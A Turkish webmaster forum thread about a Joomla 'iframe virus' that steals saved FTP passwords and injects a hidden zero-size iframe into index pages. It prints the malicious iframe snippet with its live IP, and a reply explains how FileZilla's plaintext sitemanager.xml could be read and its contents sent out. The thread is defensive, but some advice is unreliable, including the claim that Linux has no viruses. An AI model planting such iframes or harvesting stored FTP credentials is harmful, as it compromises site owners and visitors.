İframe Virüsünün Çalışma Mantığı ve Virüsten Korunma ve Kurtulma Yolları

[faruk8001]

Değerli Joomla kullanıcıları son günlerde webmasterleri zor duruma düşüren bir virüs iframe virüsü. Bu makale virüsün çalışma mantığı, virüsten korunma ve kurtulma yollarını anlatmaktadır.

Virüs'ün çalışma mantığı:
Virüs bazı sitelerden (bu siteler özellikle virüs yayan sitelerde olabilir) sizin bilgisayarınıza bulaşır. Buradanda sizin ftp bilgilerinizi ve ftp programınızı kullanarak sitenize erişim sağlar. Sitenizde ismi index.php, index.htm, index.html olan dosyalara kendisini kopyalıyor. Böylece hem sitenin yazı karakterlerinde bozulma oluyor hem de siteye giren bilgisayarlara virüs bulaştırıyor.

Virüsün sitenize eklediği kod yapısı
Virüs sitenize aşağıdaki yapıda bir kod ekliyor.

<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Virüsten korunma yolları
1. Güncel bir antivirüs kullanın. Önerim: Kaspersky, nod32v4, antivir.

2. Kullandığınız ftp programında(örn.filezilla, cuteftp vb.) ftp bilgilerinizi kayıtlı olarak tutmayın. Yani Programda işiniz bittikten sonra geçmişi temizleyin ve bilgilerinizin programda tutulmadığından emin olun. Yani otomatik giriş özelliğini varsa iptal edin. Virüs sizin programda kayıtlı parolalarınızı kullanarak sitenize erişim sağlıyor. Virüsün keyloger(tuş kaydetme) özelliği yok. Direk kayıtlı parolayı kullanıyor.

3. Belirli zaman periyotlarıyla ftp parolanızı değiştirin.

Virüs Bulaşmışsa Kurtulma Yolları

1. Öncelikle ftp kullanıcı adınızı ve parolasını değiştirin.

2. Anti-virüs programınızı güncelleyin.

3. Eğer son günlerde sitenizde önemli güncellemeler yapmadıysanız ve fazla miktarda veri girmediyseniz hosting şirketine mail atın ve virüs bulaşmadan önceki bir tarihteki yedeklerinizi yükletin. Mantık olarak son günlerde veri girmiş olsanız bile virüs veri tabanına bulaşmadığı için önceki yedekleri yükletmeniz verilerin kaybolmasına neden olmaz diye düşünüyorum ama siz her ihtimale karşı veritabanı yedeğinizi alın.

4. Eğer 3. adımı uygulamayıp virüsü elle tek tek temizlemek isterseniz ki uzun ve zahmetli bir iştir. Sitenizin dosyalarını bilgisayarınıza ftp ile çekin.

5. İndex.php ve index html dosyarınızdan yukarıda verdiğim virüsün kodlarını silin. Kodları dosya içinde arama kriteriniz 81.95.145.240 ip numarası olabilir.

6. Virüsü temizledikten sonra dosyalarınızı tekrar hosta yolların. Böylece virüssüz bir siteye kavuşursunuz. En son işinizi garantiye almak için ftp parolanızı değiştirin.

Not: Virüs'ün joomlanın 1.0.x versiyonundan kaynaklandığına dair yanlış inanışlar var. Bu virüs joomla'nın 1.5.x sürümlerine de bulaşabildiği gibi html ve asp bir siteye de bulaşabilir.

Öneriler: Linux işletim sistemi kullanmanızdır. Linuxlardan ise tavsiye ettiğim Linux sürümü Ulusal işletim sistemiz PARDUS'tur. Çünkü linux platformunda virüs olayı yok bu yüzden siteye iframe virüsünün ve diğer virüs ve trojanların bulaşma olasılığı yok denecek kadar az. Çok uzun zamandır PARDUS kullanıyorum herhangi bir virüs vakasıyla karşılaşmadım.

Web tarayıcı olarakta firefox kullanırsanız biraz olsun zararlılardan kurtulmuş olursunuz. Saygılarımla

Yazan: Ömer Faruk UYDURAN

[BOzZ]

emeğine sağlık
gerçekten kötü bir virüs temizlenmesi de bir o kadar zahmetli.ve işin kötüsü antivirüs o virüsü tespit ettiğinde direk indexi siliyor.

[faruk8001]

Yaralı olabildiysek ne mutlu bize.

[KaRaZeYbEk]

Bilgilendirme için teşekkürler

[Akar]

Faydalı olacak bir yazı. Ancak bir noktaya değineyim, arama kriteri ip olmamalı. Zira o kadar çok ip ya da url kullanılıyor ki bu bir netice vermez. Arama kriteri iframe olmalı ve bulunan neticeler tek tek kontrol edilerek temizlenmeli. Bunun ikinci sebebi ise asıl ortak noktanın iframe olmasıdır. iframe yöntemi ile yerleşen ancak diğer düzeni değişebilen bir yöntemden bahsediyoruz...belli bir virüsten değil

[Turgut Aydın]

gerçekten yararlı bir konu olmuş teşekkürler.

[elbeye]

bu "iframe" arama kriterine nereye yazıcaz acaba ?

tüm dosyalarda tek tek mi arayacagız yani?

[BOzZ]

önce bilgisayarınızı bu virüsten temizleyeceksiniz.sonra installation ve configuration.php dosyarı hariç joomla paketini tekrar üstüne yazdırın. eger hostunuzu ve bilgisayarınızı tamamen temizlediyseniz dosyalarda üstüne yazıldıgı için büyük ihtimal sorun çözülecektir.

ve tabi 3.parti eklenti yüklüyse sitede ve eklentilere de bulaşmadıysa ki büyük ihtimal onlara da bulaşmıştır.o zaman sonrada eklendilerin indexlerini açıp <iframe> diye arattırıp silebilirsiniz.

anlayacağınız kötü bir virüs

[ismailkagan]

ben kendi sunucumu kullanıyorum ve içerisinde ne kadar site varsa hepsi bu illetle karşı karşıya cpanel ve sunucu yönetimi için anlaştığım şirket hala uğraşıyorlar ki hala temizleyemediler...

bu bilgi bana çok faydalı olacak

ellerinize yüreğinize sağlık ...

[mimicom]

Benim 20 günümü alan bu iframe kodları ile temizleme noktasında edindiğim tecrübeleri sizlerle paylaşmak istiyorum. Bu yazımı dikkatle birkaç kez okuyup uyguladığınızda bu problemden kesinlikle kurtulacağınıza inanıyorum.

http://www.bizeozgu.com/index.php?op...ster&Itemid=73

[saygiserkan]

Alıntı:

mimicom´isimli üyeden alıntı Benim 20 günümü alan bu iframe kodları ile temizleme noktasında edindiğim tecrübeleri sizlerle paylaşmak istiyorum. Bu yazımı dikkatle birkaç kez okuyup uyguladığınızda bu problemden kesinlikle kurtulacağınıza inanıyorum. http://www.bizeozgu.com/index.php?op...ster&Itemid=73

Sanırım bir 20 gün daha uğraşmanız gerekecek . Çünkü Şu saat itibarı ile site index siniz '' Parse error: syntax error, unexpected '/' in /home/bizeozgu/public_html/index.php on line 85 ''

[kendimce]

eklemek iserim ki bu virüs sadece index.htm ve ,php ,html, asp vb index dosyalarına bulaşmakla kalmıyor.

ulaşım izni olmayan başka amaçla kullandığım bir sitede bulunan jpg uzantılı dosyalara da bulaşmıştır.

siteye kendi yazdığım ftp programı ile ulaşıp dosya alış verişi yapmaktayım.

site adresi google de kayıtlı değil.
daha doğrusu ortada internete açık bir site yokken bu iframeler buna bulaşmış.

diyelimki bu siteye benim bilgisayarımda olan virüs bişeyler atıyor. ama işin ilginç tarafı benim bilgisayarın kapalı olduğu zamanlarda dosyalar değişmesi.

durum kısaca şudur.


bir kere iframe yiyen sitelerin ftp şifreleri uzak bir sunucuya ya da bilgisayara iletiliyor ve istediğini kadar temizlik yapın ftp şifrelerini değiştirmedikçe kendi bilgisayarınızda antivirüs olasa da sitenize tekrar iframe atılacaktır.

eğerki ele geçirilen bayi panel şifreleri ise tüm sitelere geçecektir.

sanıldığı gibi siteye giriş yapınca bilgisayarınıza virüs bulaşmıyor. sadece o anda bilgisayarınızda kayıtlı ne kadar şifre varsa ilgili yere iletiliyor.
biliyorsunuz online olarak bilgisayarınız taranabilmektedir. ve her kaydettiğiniz şifre birgün mutlaka ele geçirilecektir.

bilgisayarınızın linux olmasının bir işe yarayacağını sanmıyorum.
(büyük ihtimalle..)dediğim gibi bu kodlarla bilgisayara virüs bulamıyor sadece anlık olarak bilgileriniz uçuyor karşıya..

eklemek isterim istekler doğrultusunda geliştirilecek olan bu tüm dosyaları arama programını kullanarak iframe veya script gibi kelimeleri tek tek arama yapmadan hengi dosyalarda olduğunu bulabilisiniz.

işte program

NOT: bir de antivürüs programların otomatik temizle olarak seçen arkadaşlar dikkat etsinler. tüm siteyi ftp ile indirdikten sonra 100 lerce dosyayı arıyorlar bende birşey yok diyorlar veya bikaçını buluyorlar. temizleyip geri göndeiyorlar oysa
virüslü inde.html dosası indirilirken antivirüs tarafından karantinaya taşınıyor veya siliniyor ve tekrar geri gönderirken bu dosya olmadığı için sunucudaki üzerine yazılamıyor sunucudaki html dosyası olduğu gibi kalıyor. bir diğer nokta ize yazma izni olmayan dosyaların üzerine attım sanılıyor oysa eskisi yenisi ile değişmiyor. bunlara da dikkat etmek gerek.

[BOzZ]

Alıntı:

kendimce´isimli üyeden alıntı eklemek iserim ki bu virüs sadece index.htm ve ,php ,html, asp vb index dosyalarına bulaşmakla kalmıyor. ulaşım izni olmayan başka amaçla kullandığım bir sitede bulunan jpg uzantılı dosyalara da bulaşmıştır. siteye kendi yazdığım ftp programı ile ulaşıp dosya alış verişi yapmaktayım. site adresi google de kayıtlı değil. daha doğrusu ortada internete açık bir site yokken bu iframeler buna bulaşmış. diyelimki bu siteye benim bilgisayarımda olan virüs bişeyler atıyor. ama işin ilginç tarafı benim bilgisayarın kapalı olduğu zamanlarda dosyalar değişmesi. durum kısaca şudur. bir kere iframe yiyen sitelerin ftp şifreleri uzak bir sunucuya ya da bilgisayara iletiliyor ve istediğini kadar temizlik yapın ftp şifrelerini değiştirmedikçe kendi bilgisayarınızda antivirüs olasa da sitenize tekrar iframe atılacaktır. eğerki ele geçirilen bayi panel şifreleri ise tüm sitelere geçecektir. sanıldığı gibi siteye giriş yapınca bilgisayarınıza virüs bulaşmıyor. sadece o anda bilgisayarınızda kayıtlı ne kadar şifre varsa ilgili yere iletiliyor. biliyorsunuz online olarak bilgisayarınız taranabilmektedir. ve her kaydettiğiniz şifre birgün mutlaka ele geçirilecektir. bilgisayarınızın linux olmasının bir işe yarayacağını sanmıyorum. (büyük ihtimalle..)dediğim gibi bu kodlarla bilgisayara virüs bulamıyor sadece anlık olarak bilgileriniz uçuyor karşıya.. eklemek isterim istekler doğrultusunda geliştirilecek olan bu tüm dosyaları arama programını kullanarak iframe veya script gibi kelimeleri tek tek arama yapmadan hengi dosyalarda olduğunu bulabilisiniz. işte program NOT: bir de antivürüs programların otomatik temizle olarak seçen arkadaşlar dikkat etsinler. tüm siteyi ftp ile indirdikten sonra 100 lerce dosyayı arıyorlar bende birşey yok diyorlar veya bikaçını buluyorlar. temizleyip geri göndeiyorlar oysa virüslü inde.html dosası indirilirken antivirüs tarafından karantinaya taşınıyor veya siliniyor ve tekrar geri gönderirken bu dosya olmadığı için sunucudaki üzerine yazılamıyor sunucudaki html dosyası olduğu gibi kalıyor. bir diğer nokta ize yazma izni olmayan dosyaların üzerine attım sanılıyor oysa eskisi yenisi ile değişmiyor. bunlara da dikkat etmek gerek.

Evet çoğu kişi sadece bilgisayara bulaştığını sanıyorlardı.Oysaki ftp aracılığıyla atılan bir virüs.Ayrıca jpg dosyalarına da bulaştığını ilk defa duyduş oldum. Çok açıklayıcı bir yazı olmuş emeğine sağlık.

Peki şifreler nasıl gidiyor.Yani ne oluyorda şifreleri anlık olarak alabiliyorlar.Bunun hakkında kesin bir bilgi var mı. Benim bildiğim kadarıyla genelde warez içerikler yoluyla bulaştığıydı.

[memoc@n]

Forumda filist.php hakkında da araştırma yapın sonuçta dosyalarda yapılan bir değişiklik söz konusu ve hangi dosyalarda bu değişikliğin yapıldığını da bulma olanağınız olacaktır

[kendimce]

çok kişi filezilla kullanıyor güvenli deniliyor. ve çoğumuzun birçok site ftpsini girmek zor geldiğinden site yönetiminden kayıt edip giriyoruz.

oysa bu programda
C:\Documents and Settings\........\Application Data\FileZilla
dizininde sitemanager.xml adındaki dosyada açık seçik şifreler tutulmakta..

bu dosyayı; adı belli adresi beli ve isteyerek veya istemeyerek tıkladığmız iframe script dosyası içinden çalışan kodlarla okuyup karşı bilgisayara iltmek çok zor değil.
anlık olarak dediğim olay bu.

virüslü siteye tıklandığı anda bizim bilgiler uçup gidiyor olabilir. ve antivürüsler buna engel de olmayabilir. neticede basit bir dosya okuma işlemi..

Alıntı:

BOzZ´isimli üyeden alıntı Peki şifreler nasıl gidiyor.Yani ne oluyorda şifreleri anlık olarak alabiliyorlar.Bunun hakkında kesin bir bilgi var mı. Benim bildiğim kadarıyla genelde warez içerikler yoluyla bulaştığıydı.